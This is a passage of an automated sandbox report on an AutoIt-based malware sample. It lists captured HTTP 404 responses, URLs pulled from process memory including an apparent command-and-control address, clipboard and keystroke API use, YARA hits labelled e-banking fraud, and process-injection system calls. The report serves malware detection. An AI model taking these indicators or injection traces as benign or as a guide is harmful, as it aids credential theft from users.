                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:40:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:40:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:40:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3365143129.0000000002831000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shopphere.store
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3365143129.0000000002831000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shopphere.store/bq63/
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.forms.ladipage.com/
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fburl.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://la.ladipage.com/
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: RMActivate_ssp_isv.exe, 00000006.00000003.2813174414.000000000798D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://optimize.google.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://td.doubleclick.net
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3367593533.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3367593533.0000000005F60000.00000004.00000800.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
                Source: RMActivate_ssp_isv.exe, 00000006.00000002.3367711132.00000000079AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleanalytics.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.00000000062C8000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleoptimize.com
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005FA4000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000038B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FE94000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=68383/jq20/
                Source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005FA4000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000038B4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FE94000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=68383/jq20/
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004A4164
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004A4164
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004A3F66
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0049001C
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_004BCABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: This is a third-party compiled AutoIt script.0_2_00433B3A
                Source: BLv4mI7zzY.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: BLv4mI7zzY.exe, 00000000.00000000.2115642457.00000000004E4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_effd5d0b-7
                Source: BLv4mI7zzY.exe, 00000000.00000000.2115642457.00000000004E4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_df15a08c-d
                Source: BLv4mI7zzY.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_57416e4c-7
                Source: BLv4mI7zzY.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d017aa82-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C5A3 NtClose,2_2_0042C5A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F14340 NtSetContextThread,LdrInitializeThunk,6_2_02F14340
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F14650 NtSuspendThread,LdrInitializeThunk,6_2_02F14650
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12AF0 NtWriteFile,LdrInitializeThunk,6_2_02F12AF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12AD0 NtReadFile,LdrInitializeThunk,6_2_02F12AD0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02F12BF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12BE0 NtQueryValueKey,LdrInitializeThunk,6_2_02F12BE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02F12BA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12B60 NtClose,LdrInitializeThunk,6_2_02F12B60
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12EE0 NtQueueApcThread,LdrInitializeThunk,6_2_02F12EE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_02F12E80
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12FE0 NtCreateFile,LdrInitializeThunk,6_2_02F12FE0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12FB0 NtResumeThread,LdrInitializeThunk,6_2_02F12FB0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12F30 NtCreateSection,LdrInitializeThunk,6_2_02F12F30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_02F12CA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02F12C70
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12C60 NtCreateKey,LdrInitializeThunk,6_2_02F12C60
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_02F12DF0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12DD0 NtDelayExecution,LdrInitializeThunk,6_2_02F12DD0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_02F12D30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12D10 NtMapViewOfSection,LdrInitializeThunk,6_2_02F12D10
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F135C0 NtCreateMutant,LdrInitializeThunk,6_2_02F135C0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F139B0 NtGetContextThread,LdrInitializeThunk,6_2_02F139B0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12AB0 NtWaitForSingleObject,6_2_02F12AB0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12B80 NtQueryInformationFile,6_2_02F12B80
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12EA0 NtAdjustPrivilegesToken,6_2_02F12EA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12E30 NtWriteVirtualMemory,6_2_02F12E30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12FA0 NtQuerySection,6_2_02F12FA0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12F90 NtProtectVirtualMemory,6_2_02F12F90
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02F12F60 NtCreateProcessEx,6_2_02F12F60
